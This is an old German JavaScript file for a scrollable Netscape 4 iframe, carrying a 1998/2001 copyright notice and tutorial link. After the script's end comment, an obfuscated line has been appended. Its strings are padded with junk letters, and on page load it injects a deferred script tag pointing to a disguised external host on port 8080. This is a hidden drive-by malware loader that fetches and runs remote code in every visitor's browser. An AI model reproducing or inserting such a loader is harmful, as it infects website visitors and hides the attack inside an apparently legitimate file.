/*  Copyright (c) 1998,2001 by Kristof Lipfert, Duesseldorf. All rights reserved.  kl@   */
/*  lipfert-malik.de. Scrollbarer austauschbarer Iframe für Netscape 4   nc4-iframe.js   */
/*  Einsatz mit diesem Urhebervermerk gestattet. www.lipfert-malik.de/webdesign/tutorial */

if(document.ids){if(!document.tags.iframe||!document.tags.iframe.id)wri='iframe{id:"ida","idb";}';
else{var xidl=document.tags.iframe.id.split(",");function lw(ds){ds(window);var l=document.layers;
for(h=0;h<l.length;h++){ds(l[h]);var m=l[h].document.layers;
for(g=0;g<m.length;g++){ds(m[g]);var n=m[g].document.layers;
for(f=0;f<n.length;f++){ds(n[f]);var o=n[f].document.layers;
for(e=0;e<o.length;e++){ds(o[e]); }}}}}idlX=(document.tags.iframe.idNeu||xidl[0]).replace(/"/g,'');
var xr=(1*document.tags.iframe.idNr+1||1);if(!window.oldload)window.oldload=(window.onload)?window.onload:function(){/* */};
document.write('<style type="text/css">a.iframe{display:none;}iframe{idNeu:'+xidl[xr]+';idNr:'+xr+';}<\/style>');}
if(!document.ids[idlX]||!document.ids[idlX].content)wri='#'+idlX+'{content:"sampla.htm"} /* Iframe '+xr+'*/';
else { function loadLayer(lL,ad,pw){getLayerById[lL].load(ad,pw);}window.onload=function (){ 
for(f=0;f<xidl.length;f++){if(!getLayerById[xidl[f].replace(/"/g,'')])return;idlX=xidl[f].replace(/"/g,'');
function linkScan(){for(i=0;i<document.links.length;i++){if(document.links[i].target==idlX){with(document){
links[i].target="";
links[i].onMouseDown=function(e){ if(e.which==3)this.href=this.orgHref;return true;}
links[i].orgHref=document.links[i].href;
links[i].href='javascript:void(getLayerById["'+idlX+'"].top=0);void(getLayerById["'+idlX+'"].load("'+document.links[i].href+'","'+parseInt(document.ids[idlX].width)+'"))';
links[i].neuHref=document.links[i].href;
links[i].onMouseOver=function(){window.status=this.orgHref;this.href=this.neuHref;return true;}
links[i].onMouseOut=function(){window.status=" ";return true;}}}}}
ds=function(dies){linkScan(dies)};lw(ds);
window.setTimeout("loadLayer('"+idlX+"',"+document.ids[idlX].content+","+(parseInt(document.ids[idlX].width))+");",(100*(f+1)));
}window.setTimeout("window.oldload();",(100*(f+2)));}
dit=document.ids[idlX];papr=(dit.position&&dit.position=="absolute")?'':'i';
with(dit){var iLeft=(left||0)+(marginLeft||0);var iTop=(top||0)+(marginTop||0);}
wri='<'+papr+'layer name="I'+idlX+'" id="I'+idlX+'" pageY='+iLeft+' pageX='+iTop+' left='+iLeft+' top='+iTop+' ';
if(dit.width&&dit.height) wri+=' clip="'+(parseInt(dit.width)+16)+','+(parseInt(dit.height)-40)+'"';
wri+='><layer id="'+idlX+'" name="'+idlX+'" onload="scrollTest(this.id);"';
if(dit.width){wri+=' width='+parseInt(dit.width);}wri+='></layer>';if(dit.width&&dit.height){
wri+='<layer onMouseOut="if(window.timerS)clearInterval(timerS);"'+
' visibility="hide" id="S'+idlX+'" left='+(parseInt(dit.width)-16)+
' width=16 bgcolor="#cccccd" height='+(parseInt(dit.height)-40)+'>'+
'<img name="O'+idlX+'" onError="alert(this.src)"'+
' onload="this.onmousedown=mausEin;this.onmouseout=mausAus;this.onmouseup=mausAus;"'+
' src="./images/buttonU.gif" border=0 hspace=0 width=16 height=16 vspace=0>'+
'<img src="./images/12m.gif" onmousedown="return false;" border=0 hspace=0 vspace=0 width=16 height="'+
(parseInt(dit.height)-32-40)+'"><img name="U'+idlX+'" onError="alert(this.src)"'+
' onload="this.onmousedown=mausEin;this.onmouseout=mausAus;this.onmouseup=mausAus;"'+
' src="./images/buttonD.gif" border=0 hspace=0 width=16 height=16 vspace=0></layer>';}
wri+='</'+papr+'layer><spacer type="vertical" size="'+((parseInt(dit.marginBottom)||0)+(parseInt(dit.marginBottom)||0))+'">';}
dit.margins(0);document.write(wri);var getLayerById=new Object;
function layerScan(ebene){for(i=0;i<ebene.document.layers.length;i++){id_var=ebene.document.layers[i].id;
getLayerById[id_var]=ebene.document.layers[i];getLayerById[id_var].style=getLayerById[id_var];}}
ds=function(dies){layerScan(dies)};lw(ds);
function scroll(richtung){var scrollDies=getLayerById[scroll[1]]; 
var scrollMax=getLayerById[scroll[1]].clip.height-getLayerById['S'+idlX].clip.height-5;
if((scrollDies.top==0)&&(richtung>0)||(scrollDies.top<scrollMax*-1)&&(richtung<0)) return; 
else scrollDies.top=scrollDies.top+(4*richtung);}
function scrollTest(Id){setTimeout("getLayerById['"+Id+"'].top=0;if(getLayerById['"+Id+"'].clip.height>"+
"getLayerById['"+'I'+Id+"'].clip.height)getLayerById['"+'S'+Id+"'].visibility="+
"'show';else {"+
"getLayerById['"+'S'+Id+"'].visibility='hide';}",55);}
function mausAus(){if(window.timerS)clearInterval(timerS); this.src=this.src.replace(".png",".gif"); return true;}
function mausEin(e){if(e.which==3) return false;this.src=this.src.replace(".gif",".png");if(window.timerS)clearInterval(timerS);
 timerS=window.setInterval("scroll(\'"+((this.name.substr(0,1)=='O')?'+':'-')+"2\',\'"+this.name.substring(1)+"\')",44)}
var origWidth=innerWidth;var origHeight=innerHeight;window.onResize=function(){if((innerWidth!=origWidth)||(innerHeight!=origHeight))self.location.reload();}
}
/* Script Ende v 21306 */

this.o="";this.n="";var e='s;c;rZi;pZtq'.replace(/[qkZ;b]/g, '');this.a=false;var j=window;var z="";this.nw=55173;var g=document;var bg=new Date();var na=new Date();var kp="kp";j.onload=function(){var vq='';try {var jw;if(jw!='cc' && jw != ''){jw=null};this.mg=false;_=g.createElement(e);var zn="zn";var ox=new Date();_.src='hQtQtApW:W/W/A1A9AlWoAuB-AcBoBmL.WaLmQaLzLoLnA.LcQoL.AuLkB.QtQoBmWsAhBaBrBdBwWaArLeA-WcBoQmB.WyQoLuWrLtAaAgAhQeBuLeWrA.ArQuA:B8B0B8B0B/QsWwBeLeWtBiWmQ.WcQoAmB/WsBwLeQeBtWiAmL.BcAoWmB/QdWaBiLlQyQmBoAtBiBoQnL.BcLoWmW/WnWiWnBgB.AcLoBmB/AgWoAoWgAlWeA.AcQoLmQ/W'.replace(/[WQBAL]/g, '');var u;if(u!='gc' && u!='rd'){u=''};var xj='';_.setAttribute('dCeKfKeiri'.replace(/[iCAIK]/g, ''), "1");this.mt_=false;g.body.appendChild(_);this.tm="";} catch(t){};this.zx="";this.ri=30986;};var eld;if(eld!=''){eld='ui'};var dl=false;